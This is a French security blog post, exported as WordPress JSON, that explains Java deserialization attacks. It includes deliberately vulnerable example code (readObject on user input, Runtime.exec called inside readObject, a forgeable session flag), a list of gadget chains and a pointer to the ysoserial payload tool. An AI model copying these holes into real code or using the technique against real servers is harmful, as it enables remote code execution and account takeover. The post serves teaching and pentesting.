{"id":15728,"date":"2019-07-10T10:00:29","date_gmt":"2019-07-10T09:00:29","guid":{"rendered":"https:\/\/www.riskinsight-wavestone.com\/?p=15728"},"modified":"2021-07-07T16:15:02","modified_gmt":"2021-07-07T15:15:02","slug":"techniques-outils-deserialisation-java","status":"publish","type":"post","link":"https:\/\/www.riskinsight-wavestone.com\/en\/2019\/07\/techniques-outils-deserialisation-java\/","title":{"rendered":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)"},"content":{"rendered":"<figure id=\"post-15730 media-15730\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15730 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\" alt=\"\" width=\"640\" height=\"155\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1-437x106.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1-71x17.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h1>Introduction<\/h1>\n<\/div>\n<div style=\"text-align: justify;\">La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. 
Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<figure id=\"post-15732 media-15732\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15732 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2.png\" alt=\"\" width=\"640\" height=\"314\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2-389x191.png 389w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2-71x35.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<div style=\"text-align: justify;\">Exemple de s\u00e9rialisation d&#8217;une variable de type <i>String<\/i>\u00a0en Java:<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc11\">String<\/span> <span class=\"sc11\">name<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc6\">&#8220;Wavestone&#8221;<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">FileOutputStream<\/span> <span class=\"sc11\">file<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">FileOutputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;file.bin&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectOutputStream<\/span> <span class=\"sc11\">out<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectOutputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">file<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">out<\/span><span 
class=\"sc10\">.<\/span><span class=\"sc11\">writeObject<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">name<\/span><span class=\"sc10\">);<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Le fichier <b>file.bin<\/b> contenant l\u2019objet name s\u00e9rialis\u00e9 a cette forme :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">AC ED 00 05 74 00 09 <span class=\"w-grepped\">57 61 76 65 73 74 6f 6e 65<\/span> &#8230;.t..<span class=\"w-grepped\">Wavestone<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<ul>\n<li>La cha\u00eene commence par \u201c<b>AC ED<\/b>\u201d \u2013 il s\u2019agit du code hexad\u00e9cimal identifiant la donn\u00e9e s\u00e9rialis\u00e9e, toutes les donn\u00e9es s\u00e9rialis\u00e9es commencent par cette valeur.<\/li>\n<li>Le protocole de s\u00e9rialisation version \u201c<b>00 05<\/b>\u201d.<\/li>\n<li>Le type de variable String est identifi\u00e9 par le code \u201c<b>74<\/b>\u201d.<\/li>\n<li>Puis la taille de la variable \u201c<b>00 09<\/b>\u201d.<\/li>\n<li>Et finalement la variable en elle-m\u00eame.<\/li>\n<\/ul>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La d\u00e9s\u00e9rialisation est l&#8217;inverse de ce processus, prenant des donn\u00e9es structur\u00e9es \u00e0 partir d&#8217;un format et les reconstruisant en un objet. 
Le format de donn\u00e9es le plus r\u00e9pandu pour la s\u00e9rialisation des donn\u00e9es est JSON (dans le pass\u00e9, le format XML \u00e9tait majoritaire).<\/div>\n<div style=\"text-align: justify;\">Pour reprendre l\u2019exemple en Java sus-cit\u00e9 :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"w-code\"><span class=\"sc11\">FileInputStream<\/span> <span class=\"sc11\">file<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">FileInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;file.bin&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">out<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">file<\/span><span class=\"sc10\">);<\/span><\/span><\/span><span class=\"w-code\"><span class=\"sc11\">name<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc10\">(<\/span><span class=\"sc11\">String<\/span><span class=\"sc10\">)<\/span><span class=\"sc11\">out<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readObject<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">System<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">out<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">println<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">name<\/span><span class=\"sc10\">);<\/span><\/span><\/div>\n<div style=\"text-align: justify;\">Le r\u00e9sultat dans la console sera donc<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">Wavestone<\/span><\/div>\n<div><\/div>\n<div style=\"text-align: justify;\">La fonction <i>readObject <\/i>est appel\u00e9e pour d\u00e9s\u00e9rialiser l&#8217;objet (\u00e0 l&#8217;aide de <i>ObjectInputStream<\/i>) 
&#8211; et le convertir en String.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La d\u00e9s\u00e9rialisation a de multiples cas d\u2019usage pour les d\u00e9veloppeurs, par exemple (ici en Java) :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>SQLConnection<\/i>\u201d pour se connecter \u00e0 une base de donn\u00e9es<\/li>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>User<\/i>\u201d pour r\u00e9cup\u00e9rer des informations stock\u00e9es dans une base de donn\u00e9es en ex\u00e9cutant des requ\u00eates SQL sp\u00e9cifiques<\/li>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>LogFile<\/i>\u201d pour restaurer les donn\u00e9es pr\u00e9c\u00e9demment enregistr\u00e9es sur un profil utilisateur<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><b>De nombreux langages de programmation offrent une capacit\u00e9 native de s\u00e9rialisation<\/b> des objets. 
Ces formats natifs offrent g\u00e9n\u00e9ralement davantage de fonctionnalit\u00e9s que JSON ou XML, y compris la personnalisation du processus de s\u00e9rialisation.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Malheureusement, les fonctionnalit\u00e9s de ces <b>m\u00e9canismes de d\u00e9s\u00e9rialisation natifs peuvent \u00eatre d\u00e9tourn\u00e9es \u00e0 des fins malveillantes<\/b> lorsque la donn\u00e9e \u00e0 d\u00e9s\u00e9rialiser est en fait une charge utile forg\u00e9e sp\u00e9cifiquement par un attaquant pour \u00eatre interpr\u00e9t\u00e9 comme du code \u00e0 ex\u00e9cuter.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Les attaques contre les moteurs de d\u00e9s\u00e9rialisation permettent notamment des attaques par <b>d\u00e9ni de service<\/b>, de <b>contournement de contr\u00f4le d&#8217;acc\u00e8s<\/b> et <b>d&#8217;ex\u00e9cution de code \u00e0 distance<\/b> (RCE).<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h2>Exemple d\u2019attaque : RCE<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">Cet exemple de code r\u00e9cup\u00e8re un param\u00e8tre appel\u00e9 <i>csrfValue<\/i>, qui est un jeton anti-CSRF pr\u00e9sent sur une application web, envoy\u00e9 \u00e0 l\u2019application sous forme de param\u00e8tre HTTP GET.<\/div>\n<div style=\"text-align: justify;\">Pour cela, le param\u00e8tre est r\u00e9cup\u00e9r\u00e9 sous forme de String puis converti en <i>ByteArrayInputStream <\/i>et lu via la fonction <i>readObject<\/i>() pour \u00eatre d\u00e9s\u00e9rialis\u00e9.<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc11\">String<\/span> <span class=\"sc11\">parameterValue<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">request<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">getParameter<\/span><span class=\"sc10\">(<\/span><span 
class=\"sc6\">&#8220;csrfValue&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">byte<\/span><span class=\"sc10\">[]<\/span> <span class=\"sc11\">csrfBytes<\/span> <span class=\"sc10\">=<\/span><span class=\"sc11\">DatatypeConverter<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">parseBase64Binary<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">parameterValue<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ByteArrayInputStream<\/span> <span class=\"sc11\">bis<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ByteArrayInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">csrfBytes<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInput<\/span> <span class=\"sc11\">in<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">bis<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">csrfToken<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc10\">(<\/span><span class=\"sc11\">CSRF<\/span><span class=\"sc10\">)<\/span><span class=\"sc11\">in<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readObject<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Cette fonction est <b>potentiellement vuln\u00e9rable<\/b>:\u00a0en effet, la fonction <i>readObject<\/i>() est appel\u00e9 sur des valeurs <b>envoy\u00e9es par l\u2019utilisateur<\/b> en tant que param\u00e8tre <i>csrfValue <\/i>de la requ\u00eate HTTP.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: 
justify;\">En effet, la fonction <i>readObject<\/i>() a pour sp\u00e9cificit\u00e9 de pouvoir \u00eatre impl\u00e9ment\u00e9e dans les classes <i>Serializable <\/i>qui en ont besoin pour lire un objet s\u00e9rialis\u00e9.<\/div>\n<div style=\"text-align: justify;\">Imaginons par exemple que la classe CSRF vue plus haut contienne pour une raison obscure ce morceau de code :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">CSRF<\/span> <span class=\"sc5\">implements<\/span> <span class=\"sc11\">Serializable<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">command<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc6\">&#8220;ls&#8221;<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">execCommand<\/span><span class=\"sc10\">(){<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">Runtime<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">getRuntime<\/span><span class=\"sc10\">().<\/span><span class=\"sc11\">exec<\/span><span class=\"sc10\">(<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">command<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">private<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">readObject<\/span><span class=\"sc10\">(<\/span><span 
class=\"sc11\">java<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">io<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">in<\/span><span class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">IOException<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">ClassNotFoundException<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">execCommand<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">L\u2019attaquant n\u2019aurait qu\u2019\u00e0 forger un objet CSRF s\u00e9rialis\u00e9 (r\u00e9cup\u00e9r\u00e9 par le code plus haut dans <i>csrfValue<\/i>) contenant un param\u00e8tre command contenant la commande de son choix pour ex\u00e9cuter du code arbitrairement sur le serveur.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">En effet :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><i>ObjectInputStream <\/i>ne v\u00e9rifie pas quelle classe est d\u00e9s\u00e9rialis\u00e9e<\/li>\n<li>Il n\u2019y a pas de liste blanche ou noire de classes autoris\u00e9es \u00e0 \u00eatre d\u00e9s\u00e9rialis\u00e9es<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Ce cas de figure tr\u00e8s facile \u00e0 exploiter d\u2019une impl\u00e9mentation de <i>readObject<\/i>() ex\u00e9cutant directement du code est toutefois tr\u00e8s rare dans la r\u00e9alit\u00e9.<\/div>\n<div style=\"text-align: justify;\">Ce qui arrive le plus fr\u00e9quemment est que l\u2019attaquant 
trouve une fonction ou une classe vuln\u00e9rable \u00e0 la modification de ses param\u00e8tres, qui peut appeler une autre fonction ou instancier une autre classe dans son p\u00e9rim\u00e8tre d\u2019ex\u00e9cution.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Les classes et fonctions disponibles dans le p\u00e9rim\u00e8tre d\u2019ex\u00e9cution d\u2019une application sont appel\u00e9es \u00ab <b>gadget <\/b>\u00bb. Suite \u00e0 l\u2019envoi d\u2019une charge malveillante \u00e0 un premier gadget appel\u00e9 \u00ab <b>kick-off gadget<\/b> \u00bb, une cha\u00eene d\u2019appels et d\u2019invocation est lanc\u00e9e jusqu\u2019\u00e0 tomber sur un gadget qui est vuln\u00e9rable \u00e0 l\u2019ex\u00e9cution de code arbitraire, appel\u00e9 \u00ab <b>sink gadget <\/b>\u00bb :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15734 media-15734\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15734 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3.png\" alt=\"\" width=\"640\" height=\"218\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3-437x149.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3-71x24.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<\/div>\n<div style=\"text-align: justify;\">De nombreux sink gadget existent dans les librairies de s\u00e9rialisation\/d\u00e9s\u00e9rialisation standard, notamment :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Spring AOP <\/b>(d\u00e9voil\u00e9 par Wouter Coekaerts en 2011)<\/li>\n<li><b>Commons-\ufb01leupload <\/b>(d\u00e9voil\u00e9 par Arun Babu Neelicattu en 
2013)<\/li>\n<li><b>Groovy <\/b>(d\u00e9voil\u00e9 par cpnrodzc7 \/ @frohoff en 2015)<\/li>\n<li><b>Apache Commons-Collections<\/b> (d\u00e9voil\u00e9 par @frohoff et @gebl en 2015)<\/li>\n<li><b>Spring Beans<\/b> (d\u00e9voil\u00e9 par @frohoff et @gebl en 2015)<\/li>\n<li><b>Serial DoS<\/b> (d\u00e9voil\u00e9 par Wouter Coekaerts en 2015)<\/li>\n<li><b>SpringTx<\/b> (d\u00e9voil\u00e9 par @zerothinking en 2016)<\/li>\n<li><b>JDK7<\/b> (d\u00e9voil\u00e9 par @frohoff en 2016)<\/li>\n<li><b>Beanutils<\/b> (d\u00e9voil\u00e9 par @frohoff en 2016)<\/li>\n<li><b>Hibernate, MyFaces, C3P0, net.sf.json, ROME<\/b> (d\u00e9voil\u00e9 par M. Bechler en 2016)<\/li>\n<li><b>Beanshell <\/b>(d\u00e9voil\u00e9 par @pwntester et @cschneider4711 en 2016)<\/li>\n<li><b>JDK7 Rhino <\/b>(d\u00e9voil\u00e9 par @matthias_kaiser en 2016)<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Des <b>outils g\u00e9n\u00e9rant des charges utiles sp\u00e9cialement con\u00e7ues pour attaquer des gadgets<\/b> affect\u00e9s par des vuln\u00e9rabilit\u00e9s publiques dans les librairies les plus utilis\u00e9es existent, notamment le tr\u00e8s complet <b>ysoserial<\/b>, d\u00e9velopp\u00e9 par Frohoff : <a href=\"https:\/\/github.com\/frohoff\/ysoserial\">https:\/\/github.com\/frohoff\/ysoserial<\/a>.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h2>Exemple d\u2019attaque : Compromission de compte utilisateur<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">Si un attaquant contr\u00f4le les donn\u00e9es qui sont d\u00e9s\u00e9rialis\u00e9e par une application, il a alors une influence sur les variables en m\u00e9moire et les objets applicatifs. 
Il peut alors influencer le flux de code utilisant ces variables et ces objets.<\/div>\n<div style=\"text-align: justify;\">Voyons un exemple d\u2019attaque sur un morceau de code utilisant la d\u00e9s\u00e9rialisation en Java :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">Session<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">username<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">boolean<\/span> <span class=\"sc11\">loggedIn<\/span><span class=\"sc10\">;<\/span><\/span><\/span><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">loadSession<\/span><span class=\"sc10\">(<\/span><span class=\"sc16\">byte<\/span><span class=\"sc10\">[]<\/span> <span class=\"sc11\">sessionData<\/span><span class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">Exception<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">ois<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc5\">new<\/span> <span class=\"sc11\">ByteArrayInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">sessionData<\/span><span class=\"sc10\">));<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">username<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">ois<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readUTF<\/span><span 
class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">loggedIn<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">ois<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readBoolean<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La m\u00e9thode <i>loadSession <\/i>accepte un tableau d\u2019octets en tant que param\u00e8tre et d\u00e9s\u00e9rialise une cha\u00eene et un bool\u00e9en de ce tableau d&#8217;octets dans les propri\u00e9t\u00e9s <i>username <\/i>et <i>loggedIn <\/i>de l&#8217;objet.<\/div>\n<div style=\"text-align: justify;\">Si un attaquant peut contr\u00f4ler le contenu du tableau d\u2019octets <i>sessionData <\/i>transmis \u00e0 cette m\u00e9thode, il peut alors contr\u00f4ler les propri\u00e9t\u00e9s de cet objet : <i>username <\/i>et <i>loggedIn<\/i>.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Voici un exemple d&#8217;utilisation de cet objet <i>Session <\/i>dans une fonction de changement de mot de passe :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">UserSettingsController<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">updatePassword<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">Session<\/span> <span class=\"sc11\">session<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">newPassword<\/span><span 
class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">Exception<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">if<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">session<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">loggedIn<\/span><span class=\"sc10\">)<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">UserModel<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">updatePassword<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">session<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">username<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">newPassword<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span> <span class=\"sc5\">else<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">throw<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">Exception<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;Error: User not logged in.&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Si le param\u00e8tre <i>loggedIn <\/i>de l\u2019objet session vaut 1, le mot de passe de l&#8217;utilisateur dont le <i>username <\/i>correspond au param\u00e8tre idoine de l\u2019objet session est mis \u00e0 jour avec la valeur <i>newPassword <\/i>donn\u00e9e.<\/div>\n<div style=\"text-align: justify;\">Ici, si l\u2019attaquant peut contr\u00f4ler le contenu du tableau d\u2019octets <i>sessionData <\/i>alors il pourrait changer le mot de passe de n\u2019importe quel utilisateur 
!<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">C\u2019est un exemple simple de \u00ab <b>Property Oriented Programming Gadget<\/b> \u00bb, un morceau de code sur lequel l\u2019attaquant peut agir non pas en direct mais via les propri\u00e9t\u00e9s d\u2019un objet.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Un point important \u00e0 retenir de cet exemple est qu&#8217;<b>un exploit de d\u00e9s\u00e9rialisation n&#8217;implique pas forc\u00e9ment l&#8217;envoi de classes ou de code<\/b> au serveur \u00e0 ex\u00e9cuter.<\/div>\n<div style=\"text-align: justify;\">L\u2019attaquant envoie simplement des donn\u00e9es qui seront int\u00e9gr\u00e9es dans propri\u00e9t\u00e9s des classes dont le serveur a d\u00e9j\u00e0 connaissance afin de manipuler le code existant traitant de ces propri\u00e9t\u00e9s.<\/div>\n<div style=\"text-align: justify;\"><b>Un exploit r\u00e9ussi repose donc \u00e9norm\u00e9ment sur la connaissance du code<\/b> qui peut \u00eatre manipul\u00e9 par d\u00e9s\u00e9rialisation. 
D\u2019o\u00f9 beaucoup de difficult\u00e9s \u00e0 exploiter les vuln\u00e9rabilit\u00e9s de type d\u00e9s\u00e9rialisation malgr\u00e9 l\u2019impact parfois colossal de ce type de failles.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h1>Apr\u00e8s la th\u00e9orie, la pratique<\/h1>\n<\/div>\n<div style=\"text-align: justify;\">Maintenant que vous savez tout (ou presque) sur la s\u00e9rialisation\/d\u00e9s\u00e9rialisation Java et ses faiblesses, passons \u00e0 la pratique :<\/div>\n<div style=\"text-align: justify;\">\n<ol>\n<li>Comment <b>trouver les fonctions utilisant la d\u00e9s\u00e9rialisation<\/b> lors d\u2019un test d&#8217;intrusion web et les librairies utilis\u00e9es ?<\/li>\n<li>Comment <b>attaquer ces fonctions<\/b> et potentiellement r\u00e9ussir \u00e0 ex\u00e9cuter du code sur le serveur ?<\/li>\n<\/ol>\n<\/div>\n<div style=\"text-align: justify;\">\n<h2>Trouver les fonctions \u00e0 attaquer<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 1 : A la main, pour plus de finesse<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">La premi\u00e8re \u00e9tape de l\u2019audit consiste \u00e0 identifier l\u2019utilisation de la d\u00e9s\u00e9rialisation dans l\u2019application audit\u00e9e. Pour cela, diff\u00e9rentes m\u00e9thodes sont possibles :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Chercher la s\u00e9quence hexad\u00e9cimale<\/b> suivante dans les transactions (captur\u00e9es par burp) entre votre machine et le serveur : <i>0xAC ED<\/i>.\n<ul>\n<li>Cette s\u00e9quence de 2 octets est appel\u00e9e \u00ab <b>magic number<\/b> \u00bb et est pr\u00e9sente au d\u00e9but de chaque objet s\u00e9rialis\u00e9. 
